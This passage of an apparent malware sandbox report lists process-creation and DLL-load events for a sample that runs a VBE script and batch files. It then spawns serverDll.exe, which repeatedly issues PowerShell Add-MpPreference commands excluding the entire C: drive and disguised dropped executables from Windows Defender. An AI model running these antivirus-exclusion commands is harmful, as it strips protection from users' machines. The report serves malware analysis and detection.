                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\Memory Compression.exe'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\backgroundTaskHost.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Videos\System.exe'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\upfc.exe'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\serverDll.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe "C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe"
                                    Source: unknownProcess created: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe "C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe"
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ff39zMQKS5.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: unknownProcess created: C:\Recovery\Memory Compression.exe "C:\Recovery\Memory Compression.exe"
                                    Source: unknownProcess created: C:\Recovery\Memory Compression.exe "C:\Recovery\Memory Compression.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: unknownProcess created: C:\ChainbrowserNet\serverDll.exe C:\ChainbrowserNet\serverDll.exe
                                    Source: unknownProcess created: C:\ChainbrowserNet\serverDll.exe C:\ChainbrowserNet\serverDll.exe
                                    Source: unknownProcess created: C:\Users\Default\Videos\System.exe "C:\Users\Default User\Videos\System.exe"
                                    Source: unknownProcess created: C:\Users\Default\Videos\System.exe "C:\Users\Default User\Videos\System.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\ChainbrowserNet\backgroundTaskHost.exe "C:\ChainbrowserNet\backgroundTaskHost.exe"
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainbrowserNet\Fsnwm63YgSc5SNPvS73lTcLZ0fh.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ChainbrowserNet\serverDll.exe "C:\ChainbrowserNet/serverDll.exe"Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ChainbrowserNet/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\Memory Compression.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\backgroundTaskHost.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Videos\System.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\upfc.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\serverDll.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ff39zMQKS5.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\ChainbrowserNet\backgroundTaskHost.exe "C:\ChainbrowserNet\backgroundTaskHost.exe"
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: version.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
